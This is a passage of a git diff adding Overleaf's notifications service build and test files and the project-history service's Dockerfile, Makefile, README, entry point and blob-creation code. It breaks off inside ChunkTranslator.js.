+# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +version: "2.3" + +services: + test_unit: + image: node:20.18.2 + volumes: + - .:/overleaf/services/notifications + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + working_dir: /overleaf/services/notifications + environment: + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + command: npm run --silent test:unit + user: node + + test_acceptance: + image: node:20.18.2 + volumes: + - .:/overleaf/services/notifications + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + working_dir: /overleaf/services/notifications + environment: + ELASTIC_SEARCH_DSN: es:9200 + MONGO_HOST: mongo + POSTGRES_HOST: postgres + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + user: node + depends_on: + mongo: + condition: service_started + command: npm run --silent test:acceptance + + mongo: + image: mongo:6.0.13 + command: --replSet overleaf + volumes: + - ../../bin/shared/mongodb-init-replica-set.js:/docker-entrypoint-initdb.d/mongodb-init-replica-set.js + environment: + MONGO_INITDB_DATABASE: sharelatex + extra_hosts: + # Required when using the automatic database setup for initializing the + # replica set. This override is not needed when running the setup after + # starting up mongo. + - mongo:127.0.0.1 + diff --git a/services/notifications/package.json b/services/notifications/package.json new file mode 100644 index 0000000..a591e89 --- /dev/null +++ b/services/notifications/package.json @@ -0,0 +1,41 @@ +{ + "name": "@overleaf/notifications", + "description": "An API to handle user notifications", + "private": true, + "main": "app.js", + "scripts": { + "start": "node app.js", + "test:acceptance:_run": "mocha --recursive --reporter spec --timeout 15000 --exit $@ test/acceptance/js", + "test:acceptance": "npm run test:acceptance:_run -- --grep=$MOCHA_GREP", + "test:unit:_run": "mocha --recursive --reporter spec $@ test/unit/js", + "test:unit": "npm run test:unit:_run -- --grep=$MOCHA_GREP", + "nodemon": "node --watch app.js", + "lint": "eslint --max-warnings 0 --format unix .", + "format": "prettier --list-different $PWD/'**/*.*js'", + "format:fix": "prettier --write $PWD/'**/*.*js'", + "lint:fix": "eslint --fix .", + "types:check": "tsc --noEmit" + }, + "author": "", + "license": "ISC", + "dependencies": { + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/settings": "*", + "async": "^3.2.5", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "express": "^4.21.2", + "method-override": "^3.0.0", + "mongodb-legacy": "6.1.3", + "request": "^2.88.2" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "sandboxed-module": "^2.0.4", + "sinon": "^9.2.4", + "typescript": "^5.0.4" + } +} diff --git a/services/notifications/test/setup.js b/services/notifications/test/setup.js new file mode 100644 index 0000000..0560fc5 --- /dev/null +++ b/services/notifications/test/setup.js @@ -0,0 +1,30 @@ +const chai = require('chai') +const SandboxedModule = require('sandboxed-module') + +// Chai configuration +chai.should() + +// ensure every ObjectId has the id string as a property for correct comparisons +require('mongodb-legacy').ObjectId.cacheHexString = true + +// SandboxedModule configuration +SandboxedModule.configure({ + requires: { + '@overleaf/logger': 
{ + debug() {}, + log() {}, + info() {}, + warn() {}, + err() {}, + error() {}, + fatal() {}, + }, + 'mongodb-legacy': require('mongodb-legacy'), // for ObjectId comparisons + }, + globals: { Buffer, JSON, console, process }, + sourceTransformers: { + removeNodePrefix: function (source) { + return source.replace(/require\(['"]node:/g, "require('") + }, + }, +}) diff --git a/services/notifications/test/unit/js/NotificationsControllerTest.js b/services/notifications/test/unit/js/NotificationsControllerTest.js new file mode 100644 index 0000000..4c0626d --- /dev/null +++ b/services/notifications/test/unit/js/NotificationsControllerTest.js @@ -0,0 +1,149 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const modulePath = '../../../app/js/NotificationsController.js' +const SandboxedModule = require('sandboxed-module') +const assert = require('node:assert') + +const userId = '51dc93e6fb625a261300003b' +const notificationId = 'fb625a26f09d' +const notificationKey = 'my-notification-key' + +describe('Notifications Controller', function () { + beforeEach(function () { + const self = this + this.notifications = {} + this.controller = SandboxedModule.require(modulePath, { + requires: { + './Notifications': this.notifications, + '@overleaf/metrics': { + inc: sinon.stub(), + }, + }, + }) + + return (this.stubbedNotification = [ + { + key: notificationKey, + messageOpts: 'some info', + templateKey: 'template-key', + }, + ]) + }) + + describe('getUserNotifications', function () { + return it('should ask the notifications for the users notifications', function (done) { + this.notifications.getUserNotifications = sinon + .stub() + .callsArgWith(1, null, this.stubbedNotification) + const req = { + params: { + user_id: userId, + }, + } + return this.controller.getUserNotifications(req, { + json: result => { + result.should.equal(this.stubbedNotification) + this.notifications.getUserNotifications + .calledWith(userId) + .should.equal(true) + return done() + }, + }) + }) + }) + + describe('addNotification', function () { + return it('should tell the notifications to add the notification for the user', function (done) { + this.notifications.addNotification = sinon.stub().callsArgWith(2) + const req = { + params: { + user_id: userId, + }, + body: this.stubbedNotification, + } + return this.controller.addNotification(req, { + sendStatus: code => { + this.notifications.addNotification + .calledWith(userId, this.stubbedNotification) + .should.equal(true) + code.should.equal(200) + return done() + }, + }) + }) + }) + + describe('removeNotificationId', function () { + return it('should tell the notifications to mark the notification Id as read', function (done) { + this.notifications.removeNotificationId = sinon.stub().callsArgWith(2) + const req = { + params: { + user_id: userId, + notification_id: notificationId, + }, + } + return this.controller.removeNotificationId(req, { + sendStatus: code => { + this.notifications.removeNotificationId + .calledWith(userId, notificationId) + .should.equal(true) + code.should.equal(200) + return done() + }, + }) + }) + }) + + describe('removeNotificationKey', function () { + return it('should tell the notifications to mark the 
notification Key as read', function (done) {
+      this.notifications.removeNotificationKey = sinon.stub().callsArgWith(2)
+      const req = {
+        params: {
+          user_id: userId,
+        },
+        body: { key: notificationKey },
+      }
+      return this.controller.removeNotificationKey(req, {
+        sendStatus: code => {
+          this.notifications.removeNotificationKey
+            .calledWith(userId, notificationKey)
+            .should.equal(true)
+          code.should.equal(200)
+          return done()
+        },
+      })
+    })
+  })
+
+  return describe('removeNotificationByKeyOnly', function () {
+    return it('should tell the notifications to mark the notification Key as read', function (done) {
+      this.notifications.removeNotificationByKeyOnly = sinon
+        .stub()
+        .callsArgWith(1)
+      const req = {
+        params: {
+          key: notificationKey,
+        },
+      }
+      return this.controller.removeNotificationByKeyOnly(req, {
+        sendStatus: code => {
+          this.notifications.removeNotificationByKeyOnly
+            .calledWith(notificationKey)
+            .should.equal(true)
+          code.should.equal(200)
+          return done()
+        },
+      })
+    })
+  })
+})
diff --git a/services/notifications/test/unit/js/NotificationsTests.js b/services/notifications/test/unit/js/NotificationsTests.js
new file mode 100644
index 0000000..fb485bb
--- /dev/null
+++ b/services/notifications/test/unit/js/NotificationsTests.js
@@ -0,0 +1,302 @@
+/* eslint-disable
+  no-dupe-keys,
+  no-return-assign,
+  no-unused-vars,
+*/
+// TODO: This file was created by bulk-decaffeinate.
+// Fix any style issues and re-enable lint.
+/*
+ * decaffeinate suggestions:
+ * DS102: Remove unnecessary code created because of implicit returns
+ * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md
+ */
+const sinon = require('sinon')
+const { expect } = require('chai')
+const modulePath = '../../../app/js/Notifications.js'
+const SandboxedModule = require('sandboxed-module')
+const assert = require('node:assert')
+const { ObjectId } = require('mongodb-legacy')
+
+const userId = '51dc93e6fb625a261300003b'
+const notificationId = '574ee8d6f40c3a244e704249'
+const notificationKey = 'notification-key'
+
+describe('Notifications Tests', function () {
+  beforeEach(function () {
+    this.findToArrayStub = sinon.stub()
+    this.findStub = sinon.stub().returns({ toArray: this.findToArrayStub })
+    this.countStub = sinon.stub()
+    this.updateOneStub = sinon.stub()
+    this.deleteOneStub = sinon.stub()
+    this.db = {
+      notifications: {
+        find: this.findStub,
+        count: this.countStub,
+        updateOne: this.updateOneStub,
+        deleteOne: this.deleteOneStub,
+      },
+    }
+
+    this.notifications = SandboxedModule.require(modulePath, {
+      requires: {
+        '@overleaf/settings': {},
+        './mongodb': { db: this.db, ObjectId },
+      },
+    })
+
+    this.stubbedNotification = {
+      user_id: new ObjectId(userId),
+      key: 'notification-key',
+      messageOpts: 'some info',
+      templateKey: 'template-key',
+    }
+    return (this.stubbedNotificationArray = [this.stubbedNotification])
+  })
+
+  describe('getUserNotifications', function () {
+    return it('should find all notifications and return them', function (done) {
+      this.findToArrayStub.callsArgWith(0, null, this.stubbedNotificationArray)
+      return this.notifications.getUserNotifications(
+        userId,
+        (err, notifications) => {
+          if (err) return done(err)
+          notifications.should.equal(this.stubbedNotificationArray)
+          assert.deepEqual(this.findStub.args[0][0], {
+            user_id: new ObjectId(userId),
+            templateKey: { $exists: true },
+          })
+          return done()
+        }
+      )
+    })
+  })
+
+  describe('addNotification', function () {
+    beforeEach(function () {
+      this.stubbedNotification = {
+        user_id: new
ObjectId(userId),
+        key: 'notification-key',
+        messageOpts: 'some info',
+        templateKey: 'template-key',
+      }
+      this.expectedDocument = {
+        user_id: this.stubbedNotification.user_id,
+        key: 'notification-key',
+        messageOpts: 'some info',
+        templateKey: 'template-key',
+      }
+      this.expectedQuery = {
+        user_id: this.stubbedNotification.user_id,
+        key: 'notification-key',
+      }
+      this.updateOneStub.yields()
+      return this.countStub.yields(null, 0)
+    })
+
+    it('should insert the notification into the collection', function (done) {
+      return this.notifications.addNotification(
+        userId,
+        this.stubbedNotification,
+        err => {
+          expect(err).not.to.exist
+          sinon.assert.calledWith(
+            this.updateOneStub,
+            this.expectedQuery,
+            { $set: this.expectedDocument },
+            { upsert: true }
+          )
+          return done()
+        }
+      )
+    })
+
+    describe('when there is an existing notification', function () {
+      beforeEach(function () {
+        return this.countStub.yields(null, 1)
+      })
+
+      it('should fail to insert', function (done) {
+        return this.notifications.addNotification(
+          userId,
+          this.stubbedNotification,
+          err => {
+            expect(err).not.to.exist
+            sinon.assert.notCalled(this.updateOneStub)
+            return done()
+          }
+        )
+      })
+
+      return it('should update the key if forceCreate is true', function (done) {
+        this.stubbedNotification.forceCreate = true
+        return this.notifications.addNotification(
+          userId,
+          this.stubbedNotification,
+          err => {
+            expect(err).not.to.exist
+            sinon.assert.calledWith(
+              this.updateOneStub,
+              this.expectedQuery,
+              { $set: this.expectedDocument },
+              { upsert: true }
+            )
+            return done()
+          }
+        )
+      })
+    })
+
+    describe('when the notification is set to expire', function () {
+      beforeEach(function () {
+        this.stubbedNotification = {
+          user_id: new ObjectId(userId),
+          key: 'notification-key',
+          messageOpts: 'some info',
+          templateKey: 'template-key',
+          expires: '2922-02-13T09:32:56.289Z',
+        }
+        this.expectedDocument = {
+          user_id: this.stubbedNotification.user_id,
+          key: 'notification-key',
+          messageOpts: 'some info',
+          templateKey: 'template-key',
+          expires: new Date(this.stubbedNotification.expires),
+        }
+        return (this.expectedQuery = {
+          user_id: this.stubbedNotification.user_id,
+          key: 'notification-key',
+        })
+      })
+
+      return it('should add an `expires` Date field to the document', function (done) {
+        return this.notifications.addNotification(
+          userId,
+          this.stubbedNotification,
+          err => {
+            expect(err).not.to.exist
+            sinon.assert.calledWith(
+              this.updateOneStub,
+              this.expectedQuery,
+              { $set: this.expectedDocument },
+              { upsert: true }
+            )
+            return done()
+          }
+        )
+      })
+    })
+
+    return describe('when the notification has a nonsensical expires field', function () {
+      beforeEach(function () {
+        this.stubbedNotification = {
+          user_id: new ObjectId(userId),
+          key: 'notification-key',
+          messageOpts: 'some info',
+          templateKey: 'template-key',
+          expires: 'WAT',
+        }
+        return (this.expectedDocument = {
+          user_id: this.stubbedNotification.user_id,
+          key: 'notification-key',
+          messageOpts: 'some info',
+          templateKey: 'template-key',
+          expires: new Date(this.stubbedNotification.expires),
+        })
+      })
+
+      return it('should produce an error', function (done) {
+        return this.notifications.addNotification(
+          userId,
+          this.stubbedNotification,
+          err => {
+            ;(err instanceof Error).should.equal(true)
+            sinon.assert.notCalled(this.updateOneStub)
+            return done()
+          }
+        )
+      })
+    })
+  })
+
+  describe('removeNotificationId', function () {
+    return it('should mark the notification id as read', function (done) {
this.updateOneStub.callsArgWith(2, null) + + return this.notifications.removeNotificationId( + userId, + notificationId, + err => { + if (err) return done(err) + const searchOps = { + user_id: new ObjectId(userId), + _id: new ObjectId(notificationId), + } + const updateOperation = { + $unset: { templateKey: true, messageOpts: true }, + } + assert.deepEqual(this.updateOneStub.args[0][0], searchOps) + assert.deepEqual(this.updateOneStub.args[0][1], updateOperation) + return done() + } + ) + }) + }) + + describe('removeNotificationKey', function () { + return it('should mark the notification key as read', function (done) { + this.updateOneStub.callsArgWith(2, null) + + return this.notifications.removeNotificationKey( + userId, + notificationKey, + err => { + if (err) return done(err) + const searchOps = { + user_id: new ObjectId(userId), + key: notificationKey, + } + const updateOperation = { + $unset: { templateKey: true }, + } + assert.deepEqual(this.updateOneStub.args[0][0], searchOps) + assert.deepEqual(this.updateOneStub.args[0][1], updateOperation) + return done() + } + ) + }) + }) + + describe('removeNotificationByKeyOnly', function () { + return it('should mark the notification key as read', function (done) { + this.updateOneStub.callsArgWith(2, null) + + return this.notifications.removeNotificationByKeyOnly( + notificationKey, + err => { + if (err) return done(err) + const searchOps = { key: notificationKey } + const updateOperation = { $unset: { templateKey: true } } + assert.deepEqual(this.updateOneStub.args[0][0], searchOps) + assert.deepEqual(this.updateOneStub.args[0][1], updateOperation) + return done() + } + ) + }) + }) + + return describe('deleteNotificationByKeyOnly', function () { + return it('should completely remove the notification', function (done) { + this.deleteOneStub.callsArgWith(1, null) + + return this.notifications.deleteNotificationByKeyOnly( + notificationKey, + err => { + if (err) return done(err) + const searchOps = { key: notificationKey } + assert.deepEqual(this.deleteOneStub.args[0][0], searchOps) + return done() + } + ) + }) + }) +}) diff --git a/services/notifications/tsconfig.json b/services/notifications/tsconfig.json new file mode 100644 index 0000000..d3fdd30 --- /dev/null +++ b/services/notifications/tsconfig.json @@ -0,0 +1,12 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "app.js", + "app/js/**/*", + "benchmarks/**/*", + "config/**/*", + "scripts/**/*", + "test/**/*", + "types" + ] +} diff --git a/services/project-history/.eslintignore b/services/project-history/.eslintignore new file mode 100644 index 0000000..8ac8c2d --- /dev/null +++ b/services/project-history/.eslintignore @@ -0,0 +1 @@ +app/lib/*.js diff --git a/services/project-history/.gitignore b/services/project-history/.gitignore new file mode 100644 index 0000000..25328fe --- /dev/null +++ b/services/project-history/.gitignore @@ -0,0 +1,8 @@ +**.swp +node_modules/ +forever/ +.config +.npm + +# managed by dev-environment$ bin/update_build_scripts +.npmrc diff --git a/services/project-history/.mocharc.json b/services/project-history/.mocharc.json new file mode 100644 index 0000000..dc3280a --- /dev/null +++ b/services/project-history/.mocharc.json @@ -0,0 +1,3 @@ +{ + "require": "test/setup.js" +} diff --git a/services/project-history/.nvmrc b/services/project-history/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/services/project-history/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/services/project-history/Dockerfile 
b/services/project-history/Dockerfile new file mode 100644 index 0000000..1bf4e56 --- /dev/null +++ b/services/project-history/Dockerfile @@ -0,0 +1,27 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +FROM node:20.18.2 AS base + +WORKDIR /overleaf/services/project-history + +# Google Cloud Storage needs a writable $HOME/.config for resumable uploads +# (see https://googleapis.dev/nodejs/storage/latest/File.html#createWriteStream) +RUN mkdir /home/node/.config && chown node:node /home/node/.config + +FROM base AS app + +COPY package.json package-lock.json /overleaf/ +COPY services/project-history/package.json /overleaf/services/project-history/ +COPY libraries/ /overleaf/libraries/ +COPY patches/ /overleaf/patches/ + +RUN cd /overleaf && npm ci --quiet + +COPY services/project-history/ /overleaf/services/project-history/ + +FROM app +USER node + +CMD ["node", "--expose-gc", "app.js"] diff --git a/services/project-history/Makefile b/services/project-history/Makefile new file mode 100644 index 0000000..5cde05e --- /dev/null +++ b/services/project-history/Makefile @@ -0,0 +1,156 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +BUILD_NUMBER ?= local +BRANCH_NAME ?= $(shell git rev-parse --abbrev-ref HEAD) +PROJECT_NAME = project-history +BUILD_DIR_NAME = $(shell pwd | xargs basename | tr -cd '[a-zA-Z0-9_.\-]') + +DOCKER_COMPOSE_FLAGS ?= -f docker-compose.yml +DOCKER_COMPOSE := BUILD_NUMBER=$(BUILD_NUMBER) \ + BRANCH_NAME=$(BRANCH_NAME) \ + PROJECT_NAME=$(PROJECT_NAME) \ + MOCHA_GREP=${MOCHA_GREP} \ + docker compose ${DOCKER_COMPOSE_FLAGS} + +COMPOSE_PROJECT_NAME_TEST_ACCEPTANCE ?= test_acceptance_$(BUILD_DIR_NAME) +DOCKER_COMPOSE_TEST_ACCEPTANCE = \ + COMPOSE_PROJECT_NAME=$(COMPOSE_PROJECT_NAME_TEST_ACCEPTANCE) $(DOCKER_COMPOSE) + +COMPOSE_PROJECT_NAME_TEST_UNIT ?= test_unit_$(BUILD_DIR_NAME) +DOCKER_COMPOSE_TEST_UNIT = \ + COMPOSE_PROJECT_NAME=$(COMPOSE_PROJECT_NAME_TEST_UNIT) $(DOCKER_COMPOSE) + +clean: + -docker rmi ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -docker rmi us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -$(DOCKER_COMPOSE_TEST_UNIT) down --rmi local + -$(DOCKER_COMPOSE_TEST_ACCEPTANCE) down --rmi local + +HERE=$(shell pwd) +MONOREPO=$(shell cd ../../ && pwd) +# Run the linting commands in the scope of the monorepo. +# Eslint and prettier (plus some configs) are on the root. 
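+# e.g. `make lint` or `make format_fix` below run the repo's npm scripts
+# inside a node:20.18.2 container with the whole monorepo mounted, so the
+# shared eslint and prettier configs at the root resolve correctly.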
+RUN_LINTING = docker run --rm -v $(MONOREPO):$(MONOREPO) -w $(HERE) node:20.18.2 npm run --silent + +RUN_LINTING_CI = docker run --rm --volume $(MONOREPO)/.editorconfig:/overleaf/.editorconfig --volume $(MONOREPO)/.eslintignore:/overleaf/.eslintignore --volume $(MONOREPO)/.eslintrc:/overleaf/.eslintrc --volume $(MONOREPO)/.prettierignore:/overleaf/.prettierignore --volume $(MONOREPO)/.prettierrc:/overleaf/.prettierrc --volume $(MONOREPO)/tsconfig.backend.json:/overleaf/tsconfig.backend.json --volume $(MONOREPO)/services/document-updater/app/js/types.ts:/overleaf/services/document-updater/app/js/types.ts ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) npm run --silent + +# Same but from the top of the monorepo +RUN_LINTING_MONOREPO = docker run --rm -v $(MONOREPO):$(MONOREPO) -w $(MONOREPO) node:20.18.2 npm run --silent + +SHELLCHECK_OPTS = \ + --shell=bash \ + --external-sources +SHELLCHECK_COLOR := $(if $(CI),--color=never,--color) +SHELLCHECK_FILES := { git ls-files "*.sh" -z; git grep -Plz "\A\#\!.*bash"; } | sort -zu + +shellcheck: + @$(SHELLCHECK_FILES) | xargs -0 -r docker run --rm -v $(HERE):/mnt -w /mnt \ + koalaman/shellcheck:stable $(SHELLCHECK_OPTS) $(SHELLCHECK_COLOR) + +shellcheck_fix: + @$(SHELLCHECK_FILES) | while IFS= read -r -d '' file; do \ + diff=$$(docker run --rm -v $(HERE):/mnt -w /mnt koalaman/shellcheck:stable $(SHELLCHECK_OPTS) --format=diff "$$file" 2>/dev/null); \ + if [ -n "$$diff" ] && ! echo "$$diff" | patch -p1 >/dev/null 2>&1; then echo "\033[31m$$file\033[0m"; \ + elif [ -n "$$diff" ]; then echo "$$file"; \ + else echo "\033[2m$$file\033[0m"; fi \ + done + +format: + $(RUN_LINTING) format + +format_ci: + $(RUN_LINTING_CI) format + +format_fix: + $(RUN_LINTING) format:fix + +lint: + $(RUN_LINTING) lint + +lint_ci: + $(RUN_LINTING_CI) lint + +lint_fix: + $(RUN_LINTING) lint:fix + +typecheck: + $(RUN_LINTING) types:check + +typecheck_ci: + $(RUN_LINTING_CI) types:check + +test: format lint typecheck shellcheck test_unit test_acceptance + +test_unit: +ifneq (,$(wildcard test/unit)) + $(DOCKER_COMPOSE_TEST_UNIT) run --rm test_unit + $(MAKE) test_unit_clean +endif + +test_clean: test_unit_clean +test_unit_clean: +ifneq (,$(wildcard test/unit)) + $(DOCKER_COMPOSE_TEST_UNIT) down -v -t 0 +endif + +test_acceptance: test_acceptance_clean test_acceptance_pre_run test_acceptance_run + $(MAKE) test_acceptance_clean + +test_acceptance_debug: test_acceptance_clean test_acceptance_pre_run test_acceptance_run_debug + $(MAKE) test_acceptance_clean + +test_acceptance_run: +ifneq (,$(wildcard test/acceptance)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance +endif + +test_acceptance_run_debug: +ifneq (,$(wildcard test/acceptance)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run -p 127.0.0.9:19999:19999 --rm test_acceptance npm run test:acceptance -- --inspect=0.0.0.0:19999 --inspect-brk +endif + +test_clean: test_acceptance_clean +test_acceptance_clean: + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) down -v -t 0 + +test_acceptance_pre_run: +ifneq (,$(wildcard test/acceptance/js/scripts/pre-run)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance test/acceptance/js/scripts/pre-run +endif + +benchmarks: + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance npm run benchmarks + +build: + docker build \ + --pull \ + --build-arg BUILDKIT_INLINE_CACHE=1 \ + --tag ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --tag us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --tag 
us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME) \
+		--cache-from us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME) \
+		--cache-from us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):main \
+		--file Dockerfile \
+		../..
+
+tar:
+	$(DOCKER_COMPOSE) up tar
+
+publish:
+
+	docker push $(DOCKER_REPO)/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER)
+
+
+.PHONY: clean \
+	format format_fix \
+	lint lint_fix \
+	build_types typecheck \
+	lint_ci format_ci typecheck_ci \
+	shellcheck shellcheck_fix \
+	test test_clean test_unit test_unit_clean \
+	test_acceptance test_acceptance_debug test_acceptance_pre_run \
+	test_acceptance_run test_acceptance_run_debug test_acceptance_clean \
+	benchmarks \
+	build tar publish \
diff --git a/services/project-history/README.md b/services/project-history/README.md
new file mode 100644
index 0000000..9d51192
--- /dev/null
+++ b/services/project-history/README.md
@@ -0,0 +1,71 @@
+@overleaf/project-history
+==========================
+
+An API for converting raw editor updates into a compressed and browseable history.
+
+Running project-history
+-----------------------
+
+The app runs natively using npm and Node on the local system:
+
+```
+npm install
+npm run start
+```
+
+Unit Tests
+----------
+
+The test suites run in Docker.
+
+Unit tests can be run in the `test_unit` container defined in `docker-compose.yml`.
+
+The makefile contains a shortcut to run these:
+
+```
+make test_unit
+```
+
+During development it is often useful to only run a subset of tests, which can be configured by passing a grep pattern through to the mocha CLI via `MOCHA_GREP`:
+
+```
+make test_unit MOCHA_GREP=AuthorizationManager
+```
+
+Acceptance Tests
+----------------
+
+Acceptance tests are run against a live service, which runs in the `test_acceptance` container defined in `docker-compose.yml`.
+
+To run the tests out-of-the-box, the makefile defines:
+
+```
+make test_acceptance
+```
+
+This brings the containers up, runs any pre-run scripts, runs the tests, and tears the containers down again. During development it is often useful to iterate more quickly by re-running only the test step against containers that are already up:
+
+```
+make test_acceptance_run   # Run as many times as needed during development
+make test_acceptance_clean # Tear the containers down when finished
+```
+
+During development it is often useful to only run a subset of tests, which can be configured by passing a grep pattern through to the mocha CLI via `MOCHA_GREP`:
+
+```
+make test_acceptance_run MOCHA_GREP=AuthorizationManager
+```
+
+Makefile and npm scripts
+------------------------
+
+The commands used to run the app, the mocha tests, and the linters are all in `package.json`. These commands call out to `mocha`, `eslint`, etc, which are available to `npm` in the local `node_modules/.bin` directory, using the local versions. Normally, these commands should not be run directly, but instead run in docker via make.
+
+The makefile contains a collection of shortcuts for running the npm scripts inside the appropriate docker containers, using the `docker-compose` files in the project.
+
+Copyright (c) Overleaf, 2017-2021.
diff --git a/services/project-history/app.js b/services/project-history/app.js
new file mode 100644
index 0000000..a72af4f
--- /dev/null
+++ b/services/project-history/app.js
@@ -0,0 +1,28 @@
+// Metrics must be initialized before importing anything else
+import '@overleaf/metrics/initialize.js'
+
+import Settings from '@overleaf/settings'
+import logger from '@overleaf/logger'
+import OError from '@overleaf/o-error'
+import { mongoClient } from './app/js/mongodb.js'
+import { app } from './app/js/server.js'
+
+const host = Settings.internal.history.host
+const port = Settings.internal.history.port
+
+mongoClient
+  .connect()
+  .then(() => {
+    app.listen(port, host, error => {
+      if (error) {
+        error = OError.tag(error, 'could not start history server')
+        logger.error({ error }, error.message)
+      } else {
+        logger.debug({}, `history starting up, listening on ${host}:${port}`)
+      }
+    })
+  })
+  .catch(err => {
+    logger.fatal({ err }, 'Cannot connect to mongo. Exiting.')
+    process.exit(1)
+  })
diff --git a/services/project-history/app/js/BlobManager.js b/services/project-history/app/js/BlobManager.js
new file mode 100644
index 0000000..8f62204
--- /dev/null
+++ b/services/project-history/app/js/BlobManager.js
@@ -0,0 +1,129 @@
+import _ from 'lodash'
+import async from 'async'
+import logger from '@overleaf/logger'
+import OError from '@overleaf/o-error'
+import * as HistoryStoreManager from './HistoryStoreManager.js'
+import * as UpdateTranslator from './UpdateTranslator.js'
+
+// avoid creating too many blobs at the same time
+const MAX_CONCURRENT_REQUESTS = 4
+// number of retry attempts for blob creation
+const RETRY_ATTEMPTS = 3
+// delay between retries
+const RETRY_INTERVAL = 100
+
+export function createBlobsForUpdates(
+  projectId,
+  historyId,
+  updates,
+  extendLock,
+  callback
+) {
+  // async.mapLimit runs jobs in parallel and returns on the first error. It
+  // doesn't wait for concurrent jobs to finish. We want to make sure all jobs
+  // are wrapped within our lock so we collect the first error encountered here
+  // and wait for all jobs to finish before returning the error.
+  let firstBlobCreationError = null
+
+  function createBlobForUpdate(update, cb) {
+    // For file additions we need to first create a blob in the history-store
+    // with the contents of the file. Then we can create a change containing a
+    // file addition operation which references the blob.
+    //
+    // To do this we decorate file creation updates with a blobHash
+    if (!UpdateTranslator.isAddUpdate(update)) {
+      return async.setImmediate(() => cb(null, { update }))
+    }
+
+    let attempts = 0
+    // Since we may be creating O(1000) blobs in an update, allow for the
+    // occasional failure to prevent the whole update failing.
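+    // With RETRY_ATTEMPTS = 3 and RETRY_INTERVAL = 100 defined above, a
+    // transient failure is retried up to twice more, roughly 100ms apart,
+    // before the error is recorded as firstBlobCreationError.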
+ let lastErr + async.retry( + { + times: RETRY_ATTEMPTS, + interval: RETRY_INTERVAL, + }, + _cb => { + attempts++ + if (attempts > 1) { + logger.error( + { + err: lastErr, + projectId, + historyId, + update: _.pick( + update, + 'doc', + 'file', + 'hash', + 'createdBlob', + 'url' + ), + attempts, + }, + 'previous createBlob attempt failed, retrying' + ) + } + // extend the lock for each file because large files may take a long time + extendLock(err => { + if (err) { + lastErr = OError.tag(err) + return _cb(lastErr) + } + HistoryStoreManager.createBlobForUpdate( + projectId, + historyId, + update, + (err, hashes) => { + if (err) { + lastErr = OError.tag(err, 'retry: error creating blob', { + projectId, + doc: update.doc, + file: update.file, + }) + _cb(lastErr) + } else { + _cb(null, hashes) + } + } + ) + }) + }, + (error, blobHashes) => { + if (error) { + if (!firstBlobCreationError) { + firstBlobCreationError = error + } + return cb(null, { update, blobHashes }) + } + + extendLock(error => { + if (error) { + if (!firstBlobCreationError) { + firstBlobCreationError = error + } + } + cb(null, { update, blobHashes }) + }) + } + ) + } + + async.mapLimit( + updates, + MAX_CONCURRENT_REQUESTS, + createBlobForUpdate, + (unusedError, updatesWithBlobs) => { + // As indicated by the name this is unexpected, but changes in the future + // could cause it to be set and ignoring it would be unexpected + if (unusedError) { + return callback(unusedError) + } + if (firstBlobCreationError) { + return callback(firstBlobCreationError) + } + callback(null, updatesWithBlobs) + } + ) +} diff --git a/services/project-history/app/js/ChunkTranslator.js b/services/project-history/app/js/ChunkTranslator.js new file mode 100644 index 0000000..544db19 --- /dev/null +++ b/services/project-history/app/js/ChunkTranslator.js @@ -0,0 +1,626 @@ +import _ from 'lodash' +import logger from '@overleaf/logger' +import OError from '@overleaf/o-error' +import * as HistoryStoreManager from './HistoryStoreManager.js' +import * as WebApiManager from './WebApiManager.js' +import * as Errors from './Errors.js' +import { + TextOperation, + InsertOp, + RemoveOp, + RetainOp, + Range, + TrackedChangeList, +} from 'overleaf-editor-core' + +/** + * @import { RawEditOperation, TrackedChangeRawData } from 'overleaf-editor-core/lib/types' + */ + +export function convertToSummarizedUpdates(chunk, callback) { + const version = chunk.chunk.startVersion + const { files } = chunk.chunk.history.snapshot + const builder = new UpdateSetBuilder(version, files) + + for (const change of chunk.chunk.history.changes) { + try { + builder.applyChange(change) + } catch 